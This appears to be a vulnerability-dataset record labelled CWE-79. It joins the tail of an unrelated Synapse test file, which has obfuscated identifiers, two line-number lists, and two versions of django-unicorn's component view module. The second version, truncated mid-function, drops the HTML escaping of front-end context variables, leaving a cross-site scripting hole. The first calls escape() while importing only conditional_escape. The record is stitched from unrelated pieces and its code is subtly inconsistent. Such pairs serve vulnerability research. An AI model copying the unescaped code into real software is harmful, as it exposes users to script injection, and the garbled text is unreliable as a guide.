self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def FUNC_5(self):
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
self.assertEqual(self.store._known_servers_count, 2)
def FUNC_6(self):
VAR_7 = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_8 = self.get_success(
event_injection.inject_member_event(
self.hs, VAR_7, self.u_bob, Membership.JOIN
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_8.event_id],
type="m.test.1",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
VAR_12 = self.get_success(
event_injection.inject_event(
self.hs,
room_id=VAR_7,
sender=self.u_bob,
prev_event_ids=[VAR_8.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_12.event_id],
type="m.test.3",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_1(self, VAR_1, VAR_2, VAR_4):
self.store = VAR_4.get_datastore()
self.room_creator = VAR_4.get_room_creation_handler()
def FUNC_7(self):
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
VAR_13 = UserID("alice", "test")
VAR_14 = create_requester(VAR_13)
self.get_success(self.room_creator.create_room(VAR_14, {}))
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
self.store.db_pool.updates._all_done = False
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
23,
27,
28,
30,
36,
42,
44,
45,
46,
48,
52,
53,
55,
57,
58,
60,
66,
68,
76,
79,
85,
89,
91,
93,
101,
103,
105,
106,
107,
109,
113,
115,
116,
118,
126,
127,
138,
143,
144,
145,
146,
172,
173,
178,
180,
187,
188,
192,
193,
204,
205,
207,
208,
215,
70,
71,
72,
81,
82,
83,
98,
99,
100
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
23,
27,
28,
30,
36,
42,
44,
45,
46,
48,
52,
53,
55,
57,
58,
60,
66,
68,
76,
79,
85,
89,
91,
93,
101,
103,
105,
106,
107,
109,
113,
115,
116,
118,
126,
127,
138,
143,
144,
145,
146,
172,
173,
178,
180,
187,
188,
192,
193,
204,
205,
207,
208,
215,
70,
71,
72,
81,
82,
83,
98,
99,
100
] |
1CWE-79
| import importlib
import inspect
import logging
import pickle
import sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import settings
from django.core.cache import caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.utils.html import conditional_escape
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
logger = logging.getLogger(__name__)
# TODO: Make maxsize configurable
location_cache = LRUCache(maxsize=100)
# Module cache to store the found component class by id
views_cache = LRUCache(maxsize=100)
# Module cache for constructed component classes
# This can create a subtle race condition so a more long-term solution needs to be found
constructed_views_cache = LRUCache(maxsize=100)
COMPONENTS_MODULE_CACHE_ENABLED = "pytest" not in sys.modules
def convert_to_snake_case(s: str) -> str:
# TODO: Better handling of dash->snake
return s.replace("-", "_")
def convert_to_pascal_case(s: str) -> str:
# TODO: Better handling of dash/snake->pascal-case
s = convert_to_snake_case(s)
return "".join(word.title() for word in s.split("_"))
def get_locations(component_name):
locations = []
if "." in component_name:
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Handle fully-qualified component names (e.g. `project.unicorn.HelloWorldView`)
class_name = component_name.split(".")[-1:][0]
module_name = component_name.replace("." + class_name, "")
locations.append((class_name, module_name))
# Assume if it ends with "View", then we don't need to add other
if component_name.endswith("View") or component_name.endswith("Component"):
return locations
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Use conventions to find the component class
class_name = convert_to_pascal_case(component_name)
if "." in class_name:
if class_name.split(".")[-1:]:
class_name = class_name.split(".")[-1:][0]
class_name = f"{class_name}View"
module_name = convert_to_snake_case(component_name)
unicorn_apps = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(unicorn_apps, list)
or isinstance(unicorn_apps, tuple)
or isinstance(unicorn_apps, set)
), "APPS is expected to be a list, tuple or set"
for app in unicorn_apps:
# Handle an installed app that actually points to an app config
if ".apps." in app:
app_config_idx = app.rindex(".apps.")
app = app[:app_config_idx]
app_module_name = f"{app}.components.{module_name}"
locations.append((class_name, app_module_name))
return locations
@timed
def construct_component(
component_class,
component_id,
component_name,
component_key,
parent,
request,
**kwargs,
):
"""
Constructs a class instance.
"""
component = component_class(
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
component.calls = []
component.children = []
component._children_set = False
component.mount()
component.hydrate()
component.complete()
component._validate_called = False
return component
class UnicornView(TemplateView):
response_class = UnicornTemplateResponse
component_name: str = ""
component_key: str = ""
request = None
parent = None
children = []
# Caches to reduce the amount of time introspecting the class
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
# Dictionary with key: attribute name; value: pickled attribute value
_resettable_attributes_cache: Dict[str, Any] = {}
# JavaScript method calls
calls = []
def __init__(self, **kwargs):
super().__init__(**kwargs)
assert self.component_name, "Component name is required"
if "id" in kwargs and kwargs["id"]:
# Sometimes the component_id is initially in kwargs["id"]
self.component_id = kwargs["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:component:{self.component_id}"
if "request" in kwargs:
self.setup(kwargs["request"])
if "parent" in kwargs:
self.parent = kwargs["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def _set_default_template_name(self) -> None:
"""
Sets a default template name based on component's name if necessary.
"""
get_template_names_is_valid = False
try:
# Check for get_template_names by explicitly calling it since it
# is defined in TemplateResponseMixin, but can throw ImproperlyConfigured.
self.get_template_names()
get_template_names_is_valid = True
except ImproperlyConfigured:
pass
if not self.template_name and not get_template_names_is_valid:
# Convert component name with a dot to a folder structure
template_name = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{template_name}.html"
@timed
def _set_caches(self) -> None:
"""
Setup some initial "caches" to prevent Python from having to introspect
a component UnicornView for methods and properties multiple times.
"""
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def reset(self):
for (
attribute_name,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
attribute_value = pickle.loads(pickled_value)
self._set_property(attribute_name, attribute_value)
except TypeError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be de-pickled."
)
pass
def call(self, function_name, *args):
"""
Add a JavaScript method name and arguments to be called after the component is rendered.
"""
self.calls.append({"fn": function_name, "args": args})
def mount(self):
"""
Hook that gets called when the component is first created.
"""
pass
def hydrate(self):
"""
Hook that gets called when the component's data is hydrated.
"""
pass
def complete(self):
"""
Hook that gets called after all component methods are executed.
"""
pass
def rendered(self, html):
"""
Hook that gets called after the component has been rendered.
"""
pass
def parent_rendered(self, html):
"""
Hook that gets called after the component's parent has been rendered.
"""
pass
def updating(self, name, value):
"""
Hook that gets called when a component's data is about to get updated.
"""
pass
def updated(self, name, value):
"""
Hook that gets called when a component's data is updated.
"""
pass
def calling(self, name, args):
"""
Hook that gets called when a component's method is about to get called.
"""
pass
def called(self, name, args):
"""
Hook that gets called when a component's method is called.
"""
pass
@timed
def render(self, init_js=False) -> str:
"""
Renders a UnicornView component with the public properties available. Delegates to a
UnicornTemplateResponse to actually render a response.
Args:
param init_js: Whether or not to include the Javascript required to initialize the component.
"""
response = self.render_to_response(
context=self.get_context_data(), component=self, init_js=init_js,
)
# render_to_response() could only return a HttpResponse, so check for render()
if hasattr(response, "render"):
response.render()
rendered_component = response.content.decode("utf-8")
# Set the current component as a child of the parent if there is a parent
# If no parent, mark that the component has its children set.
# This works because the nested (internal) components get rendered first before the parent,
# so once we hit a component without a parent we know all of the children have been rendered correctly
# TODO: This might fall apart with a third layer of nesting components
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return rendered_component
@timed
def get_frontend_context_variables(self) -> str:
"""
Get publicly available properties and output them in a string-encoded JSON object.
"""
frontend_context_variables = {}
attributes = self._attributes()
frontend_context_variables.update(attributes)
# Remove any field in `javascript_exclude` from `frontend_context_variables`
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in frontend_context_variables:
del frontend_context_variables[field_name]
safe_fields = []
# Keep a list of fields that are safe to not sanitize from `frontend_context_variables`
if hasattr(self, "Meta") and hasattr(self.Meta, "safe"):
if isinstance(self.Meta.safe, Sequence):
for field_name in self.Meta.safe:
if field_name in frontend_context_variables:
safe_fields.append(field_name)
# Add cleaned values to `frontend_content_variables` based on the widget in form's fields
form = self._get_form(attributes)
if form:
form.is_valid()
for key in attributes.keys():
if key in form.fields:
field = form.fields[key]
if key in form.cleaned_data:
cleaned_value = form.cleaned_data[key]
value = field.widget.format_value(cleaned_value)
# Don't update the frontend variable if the only change is
# stripping off the whitespace from the field value
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if (
not hasattr(frontend_context_variables[key], "strip")
or frontend_context_variables[key].strip() != value
):
frontend_context_variables[key] = value
for (
frontend_context_variable_key,
frontend_context_variable_value,
) in frontend_context_variables.items():
if (
isinstance(frontend_context_variable_value, str)
and frontend_context_variable_key not in safe_fields
):
frontend_context_variables[frontend_context_variable_key] = escape(
frontend_context_variable_value
)
encoded_frontend_context_variables = serializer.dumps(
frontend_context_variables
)
return encoded_frontend_context_variables
@timed
def _get_form(self, data):
if hasattr(self, "form_class"):
try:
form = self.form_class(data)
form.is_valid()
return form
except Exception as e:
logger.exception(e)
@timed
def get_context_data(self, **kwargs):
"""
Overrides the standard `get_context_data` to add in publicly available
properties and methods.
"""
context = super().get_context_data(**kwargs)
attributes = self._attributes()
context.update(attributes)
context.update(self._methods())
context.update({"unicorn": {"errors": self.errors}})
return context
@timed
def is_valid(self, model_names: List = None) -> bool:
return len(self.validate(model_names).keys()) == 0
@timed
def validate(self, model_names: List = None) -> Dict:
"""
Validates the data using the `form_class` set on the component.
Args:
model_names: Only include validation errors for specified fields. If none, validate everything.
"""
# TODO: Handle form.non_field_errors()?
if self._validate_called:
return self.errors
self._validate_called = True
data = self._attributes()
form = self._get_form(data)
if form:
form_errors = form.errors.get_json_data(escape_html=True)
# This code is confusing, but handles this use-case:
# the component has two models, one that starts with an error and one
# that is valid. Validating the valid one should not show an error for
# the invalid one. Only after the invalid field is updated, should the
# error show up and persist, even after updating the valid form.
if self.errors:
keys_to_remove = []
for key, value in self.errors.items():
if key in form_errors:
self.errors[key] = value
else:
keys_to_remove.append(key)
for key in keys_to_remove:
self.errors.pop(key)
if model_names is not None:
for key, value in form_errors.items():
if key in model_names:
self.errors[key] = value
else:
self.errors.update(form_errors)
return self.errors
@timed
def _attribute_names(self) -> List[str]:
"""
Gets publicly available attribute names. Cached in `_attribute_names_cache`.
"""
non_callables = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
attribute_names = [name for name in non_callables if self._is_public(name)]
return attribute_names
@timed
def _attributes(self) -> Dict[str, Any]:
"""
Get publicly available attributes and their values from the component.
"""
attribute_names = self._attribute_names_cache
attributes = {}
for attribute_name in attribute_names:
attributes[attribute_name] = getattr(self, attribute_name)
return attributes
@timed
def _set_property(self, name, value):
# Get the correct value type by using the form if it is available
data = self._attributes()
data[name] = value
form = self._get_form(data)
if form and name in form.fields and name in form.cleaned_data:
# The Django form CharField validator will remove whitespace
# from the field value. Ignore that update if it's the
# only thing different from the validator
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if not hasattr(value, "strip") or form.cleaned_data[name] != value.strip():
value = form.cleaned_data[name]
updating_function_name = f"updating_{name}"
if hasattr(self, updating_function_name):
getattr(self, updating_function_name)(value)
try:
setattr(self, name, value)
updated_function_name = f"updated_{name}"
if hasattr(self, updated_function_name):
getattr(self, updated_function_name)(value)
except AttributeError as e:
raise
@timed
def _methods(self) -> Dict[str, Callable]:
"""
Get publicly available method names and their functions from the component.
Cached in `_methods_cache`.
"""
if self._methods_cache:
return self._methods_cache
member_methods = inspect.getmembers(self, inspect.ismethod)
public_methods = [
method for method in member_methods if self._is_public(method[0])
]
methods = {k: v for (k, v) in public_methods}
self._methods_cache = methods
return methods
@timed
def _set_hook_methods_cache(self) -> None:
"""
Caches the updating/updated attribute function names defined on the component.
"""
self._hook_methods_cache = []
for attribute_name in self._attribute_names_cache:
updating_function_name = f"updating_{attribute_name}"
updated_function_name = f"updated_{attribute_name}"
hook_function_names = [updating_function_name, updated_function_name]
for function_name in hook_function_names:
if hasattr(self, function_name):
self._hook_methods_cache.append(function_name)
@timed
def _set_resettable_attributes_cache(self) -> None:
"""
Caches the attributes that are "resettable" in `_resettable_attributes_cache`.
Cache is a dictionary with key: attribute name; value: pickled attribute value
Examples:
- `UnicornField`
- Django Models without a defined pk
"""
self._resettable_attributes_cache = {}
for attribute_name, attribute_value in self._attributes().items():
if isinstance(attribute_value, UnicornField):
self._resettable_attributes_cache[attribute_name] = pickle.dumps(
attribute_value
)
elif isinstance(attribute_value, Model):
if not attribute_value.pk:
if attribute_name not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
attribute_name
] = pickle.dumps(attribute_value)
except pickle.PickleError:
logger.warn(
f"Caching '{attribute_name}' failed because it could not be pickled."
)
pass
def _is_public(self, name: str) -> bool:
"""
Determines if the name should be sent in the context.
"""
# Ignore some standard attributes from TemplateView
protected_names = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
# Component methods
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
excludes = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
excludes = self.Meta.exclude
return not (
name.startswith("_")
or name in protected_names
or name in self._hook_methods_cache
or name in excludes
)
@staticmethod
@timed
def create(
component_id: str,
component_name: str,
component_key: str = "",
parent: "UnicornView" = None,
request: HttpRequest = None,
use_cache=True,
kwargs: Dict[str, Any] = {},
) -> "UnicornView":
"""
Find and instantiate a component class based on `component_name`.
Args:
param component_id: Id of the component. Required.
param component_name: Name of the component. Used to locate the correct `UnicornView`
component class and template if necessary. Required.
param component_key: Key of the component to allow multiple components of the same name
to be differentiated. Optional.
param parent: The parent component of the current component.
param kwargs: Keyword arguments for the component passed in from the template. Defaults to `{}`.
Returns:
Instantiated `UnicornView` component.
Raises `ComponentLoadError` if the component could not be loaded.
"""
assert component_id, "Component id is required"
assert component_name, "Component name is required"
@timed
def _get_component_class(
module_name: str, class_name: str
) -> Type[UnicornView]:
"""
Imports a component based on module and class name.
"""
module = importlib.import_module(module_name)
component_class = getattr(module, class_name)
return component_class
cache = caches[get_cache_alias()]
component_cache_key = f"unicorn:component:{component_id}"
cached_component = cache.get(component_cache_key)
if cached_component:
# Get the newest version of the parent from cache if it is available
# This needs to happen for Django cache because instances is pickled, so
# a change in the view won't be reflected automatically (like with the module
# cache) so it needs to be retrieved manually.
if cached_component.parent:
cached_parent_component = cache.get(
cached_component.parent.component_cache_key
)
if cached_parent_component:
cached_component.parent = cached_parent_component
cached_component.parent.setup(request)
else:
cached_component = constructed_views_cache.get(component_id)
if use_cache and cached_component:
# Note that `hydrate()` and `complete` don't need to be called here
# because this path only happens for re-rendering from the view
cached_component.setup(request)
cached_component._validate_called = False
cached_component.calls = []
logger.debug(f"Retrieve {component_id} from constructed views cache")
return cached_component
if component_id in views_cache:
(component_class, parent, kwargs) = views_cache[component_id]
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
logger.debug(f"Retrieve {component_id} from views cache")
return component
locations = []
if component_name in location_cache:
locations.append(location_cache[component_name])
else:
locations = get_locations(component_name)
# Store the last exception that got raised while looking for a component in case it is useful context
last_exception: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (class_name, module_name) in locations:
try:
component_class = _get_component_class(module_name, class_name)
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
# Put the location for the component name in a module cache
location_cache[component_name] = (class_name, module_name)
# Put the component's class in a module cache
views_cache[component_id] = (component_class, parent, kwargs)
# Put the instantiated component into a module cache and the Django cache
cacheable_component = None
try:
cacheable_component = get_cacheable_component(component)
except UnicornCacheError as e:
logger.warning(e)
if cacheable_component:
if COMPONENTS_MODULE_CACHE_ENABLED:
constructed_views_cache[component_id] = cacheable_component
cache.set(
cacheable_component.component_cache_key, cacheable_component
)
return component
except ModuleNotFoundError as e:
last_exception = e
except AttributeError as e:
last_exception = e
raise ComponentLoadError(
f"'{component_name}' component could not be loaded: {last_exception}"
) from last_exception
| import importlib
import inspect
import logging
import pickle
import sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import settings
from django.core.cache import caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
logger = logging.getLogger(__name__)
# TODO: Make maxsize configurable
location_cache = LRUCache(maxsize=100)
# Module cache to store the found component class by id
views_cache = LRUCache(maxsize=100)
# Module cache for constructed component classes
# This can create a subtle race condition so a more long-term solution needs to be found
constructed_views_cache = LRUCache(maxsize=100)
COMPONENTS_MODULE_CACHE_ENABLED = "pytest" not in sys.modules
def convert_to_snake_case(s: str) -> str:
# TODO: Better handling of dash->snake
return s.replace("-", "_")
def convert_to_pascal_case(s: str) -> str:
# TODO: Better handling of dash/snake->pascal-case
s = convert_to_snake_case(s)
return "".join(word.title() for word in s.split("_"))
def get_locations(component_name):
locations = []
if "." in component_name:
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Handle fully-qualified component names (e.g. `project.unicorn.HelloWorldView`)
class_name = component_name.split(".")[-1:][0]
module_name = component_name.replace("." + class_name, "")
locations.append((class_name, module_name))
# Assume if it ends with "View", then we don't need to add other
if component_name.endswith("View") or component_name.endswith("Component"):
return locations
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Use conventions to find the component class
class_name = convert_to_pascal_case(component_name)
if "." in class_name:
if class_name.split(".")[-1:]:
class_name = class_name.split(".")[-1:][0]
class_name = f"{class_name}View"
module_name = convert_to_snake_case(component_name)
unicorn_apps = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(unicorn_apps, list)
or isinstance(unicorn_apps, tuple)
or isinstance(unicorn_apps, set)
), "APPS is expected to be a list, tuple or set"
for app in unicorn_apps:
# Handle an installed app that actually points to an app config
if ".apps." in app:
app_config_idx = app.rindex(".apps.")
app = app[:app_config_idx]
app_module_name = f"{app}.components.{module_name}"
locations.append((class_name, app_module_name))
return locations
@timed
def construct_component(
component_class,
component_id,
component_name,
component_key,
parent,
request,
**kwargs,
):
"""
Constructs a class instance.
"""
component = component_class(
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
component.calls = []
component.children = []
component._children_set = False
component.mount()
component.hydrate()
component.complete()
component._validate_called = False
return component
class UnicornView(TemplateView):
response_class = UnicornTemplateResponse
component_name: str = ""
component_key: str = ""
request = None
parent = None
children = []
# Caches to reduce the amount of time introspecting the class
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
# Dictionary with key: attribute name; value: pickled attribute value
_resettable_attributes_cache: Dict[str, Any] = {}
# JavaScript method calls
calls = []
def __init__(self, **kwargs):
super().__init__(**kwargs)
assert self.component_name, "Component name is required"
if "id" in kwargs and kwargs["id"]:
# Sometimes the component_id is initially in kwargs["id"]
self.component_id = kwargs["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:component:{self.component_id}"
if "request" in kwargs:
self.setup(kwargs["request"])
if "parent" in kwargs:
self.parent = kwargs["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def _set_default_template_name(self) -> None:
"""
Sets a default template name based on component's name if necessary.
"""
get_template_names_is_valid = False
try:
# Check for get_template_names by explicitly calling it since it
# is defined in TemplateResponseMixin, but can throw ImproperlyConfigured.
self.get_template_names()
get_template_names_is_valid = True
except ImproperlyConfigured:
pass
if not self.template_name and not get_template_names_is_valid:
# Convert component name with a dot to a folder structure
template_name = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{template_name}.html"
@timed
def _set_caches(self) -> None:
"""
Setup some initial "caches" to prevent Python from having to introspect
a component UnicornView for methods and properties multiple times.
"""
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def reset(self):
for (
attribute_name,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
attribute_value = pickle.loads(pickled_value)
self._set_property(attribute_name, attribute_value)
except TypeError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be de-pickled."
)
pass
def call(self, function_name, *args):
"""
Add a JavaScript method name and arguments to be called after the component is rendered.
"""
self.calls.append({"fn": function_name, "args": args})
def mount(self):
"""
Hook that gets called when the component is first created.
"""
pass
def hydrate(self):
"""
Hook that gets called when the component's data is hydrated.
"""
pass
def complete(self):
"""
Hook that gets called after all component methods are executed.
"""
pass
def rendered(self, html):
"""
Hook that gets called after the component has been rendered.
"""
pass
def parent_rendered(self, html):
"""
Hook that gets called after the component's parent has been rendered.
"""
pass
def updating(self, name, value):
"""
Hook that gets called when a component's data is about to get updated.
"""
pass
def updated(self, name, value):
"""
Hook that gets called when a component's data is updated.
"""
pass
def calling(self, name, args):
"""
Hook that gets called when a component's method is about to get called.
"""
pass
def called(self, name, args):
"""
Hook that gets called when a component's method is called.
"""
pass
@timed
def render(self, init_js=False) -> str:
"""
Renders a UnicornView component with the public properties available. Delegates to a
UnicornTemplateResponse to actually render a response.
Args:
param init_js: Whether or not to include the Javascript required to initialize the component.
"""
response = self.render_to_response(
context=self.get_context_data(), component=self, init_js=init_js,
)
# render_to_response() could only return a HttpResponse, so check for render()
if hasattr(response, "render"):
response.render()
rendered_component = response.content.decode("utf-8")
# Set the current component as a child of the parent if there is a parent
# If no parent, mark that the component has its children set.
# This works because the nested (internal) components get rendered first before the parent,
# so once we hit a component without a parent we know all of the children have been rendered correctly
# TODO: This might fall apart with a third layer of nesting components
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return rendered_component
@timed
def get_frontend_context_variables(self) -> str:
"""
Get publicly available properties and output them in a string-encoded JSON object.
"""
frontend_context_variables = {}
attributes = self._attributes()
frontend_context_variables.update(attributes)
# Remove any field in `javascript_exclude` from `frontend_context_variables`
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in frontend_context_variables:
del frontend_context_variables[field_name]
# Add cleaned values to `frontend_content_variables` based on the widget in form's fields
form = self._get_form(attributes)
if form:
form.is_valid()
for key in attributes.keys():
if key in form.fields:
field = form.fields[key]
if key in form.cleaned_data:
cleaned_value = form.cleaned_data[key]
value = field.widget.format_value(cleaned_value)
# Don't update the frontend variable if the only change is
# stripping off the whitespace from the field value
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if (
not hasattr(frontend_context_variables[key], "strip")
or frontend_context_variables[key].strip() != value
):
frontend_context_variables[key] = value
encoded_frontend_context_variables = serializer.dumps(
frontend_context_variables
)
return encoded_frontend_context_variables
@timed
def _get_form(self, data):
if hasattr(self, "form_class"):
try:
form = self.form_class(data)
form.is_valid()
return form
except Exception as e:
logger.exception(e)
@timed
def get_context_data(self, **kwargs):
"""
Overrides the standard `get_context_data` to add in publicly available
properties and methods.
"""
context = super().get_context_data(**kwargs)
attributes = self._attributes()
context.update(attributes)
context.update(self._methods())
context.update({"unicorn": {"errors": self.errors}})
return context
@timed
def is_valid(self, model_names: List = None) -> bool:
return len(self.validate(model_names).keys()) == 0
@timed
def validate(self, model_names: List = None) -> Dict:
"""
Validates the data using the `form_class` set on the component.
Args:
model_names: Only include validation errors for specified fields. If none, validate everything.
"""
# TODO: Handle form.non_field_errors()?
if self._validate_called:
return self.errors
self._validate_called = True
data = self._attributes()
form = self._get_form(data)
if form:
form_errors = form.errors.get_json_data(escape_html=True)
# This code is confusing, but handles this use-case:
# the component has two models, one that starts with an error and one
# that is valid. Validating the valid one should not show an error for
# the invalid one. Only after the invalid field is updated, should the
# error show up and persist, even after updating the valid form.
if self.errors:
keys_to_remove = []
for key, value in self.errors.items():
if key in form_errors:
self.errors[key] = value
else:
keys_to_remove.append(key)
for key in keys_to_remove:
self.errors.pop(key)
if model_names is not None:
for key, value in form_errors.items():
if key in model_names:
self.errors[key] = value
else:
self.errors.update(form_errors)
return self.errors
@timed
def _attribute_names(self) -> List[str]:
"""
Gets publicly available attribute names. Cached in `_attribute_names_cache`.
"""
non_callables = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
attribute_names = [name for name in non_callables if self._is_public(name)]
return attribute_names
@timed
def _attributes(self) -> Dict[str, Any]:
"""
Get publicly available attributes and their values from the component.
"""
attribute_names = self._attribute_names_cache
attributes = {}
for attribute_name in attribute_names:
attributes[attribute_name] = getattr(self, attribute_name)
return attributes
@timed
def _set_property(self, name, value):
# Get the correct value type by using the form if it is available
data = self._attributes()
data[name] = value
form = self._get_form(data)
if form and name in form.fields and name in form.cleaned_data:
# The Django form CharField validator will remove whitespace
# from the field value. Ignore that update if it's the
# only thing different from the validator
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if not hasattr(value, "strip") or form.cleaned_data[name] != value.strip():
value = form.cleaned_data[name]
updating_function_name = f"updating_{name}"
if hasattr(self, updating_function_name):
getattr(self, updating_function_name)(value)
try:
setattr(self, name, value)
updated_function_name = f"updated_{name}"
if hasattr(self, updated_function_name):
getattr(self, updated_function_name)(value)
except AttributeError as e:
raise
@timed
def _methods(self) -> Dict[str, Callable]:
"""
Get publicly available method names and their functions from the component.
Cached in `_methods_cache`.
"""
if self._methods_cache:
return self._methods_cache
member_methods = inspect.getmembers(self, inspect.ismethod)
public_methods = [
method for method in member_methods if self._is_public(method[0])
]
methods = {k: v for (k, v) in public_methods}
self._methods_cache = methods
return methods
@timed
def _set_hook_methods_cache(self) -> None:
"""
Caches the updating/updated attribute function names defined on the component.
"""
self._hook_methods_cache = []
for attribute_name in self._attribute_names_cache:
updating_function_name = f"updating_{attribute_name}"
updated_function_name = f"updated_{attribute_name}"
hook_function_names = [updating_function_name, updated_function_name]
for function_name in hook_function_names:
if hasattr(self, function_name):
self._hook_methods_cache.append(function_name)
@timed
def _set_resettable_attributes_cache(self) -> None:
"""
Caches the attributes that are "resettable" in `_resettable_attributes_cache`.
Cache is a dictionary with key: attribute name; value: pickled attribute value
Examples:
- `UnicornField`
- Django Models without a defined pk
"""
self._resettable_attributes_cache = {}
for attribute_name, attribute_value in self._attributes().items():
if isinstance(attribute_value, UnicornField):
self._resettable_attributes_cache[attribute_name] = pickle.dumps(
attribute_value
)
elif isinstance(attribute_value, Model):
if not attribute_value.pk:
if attribute_name not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
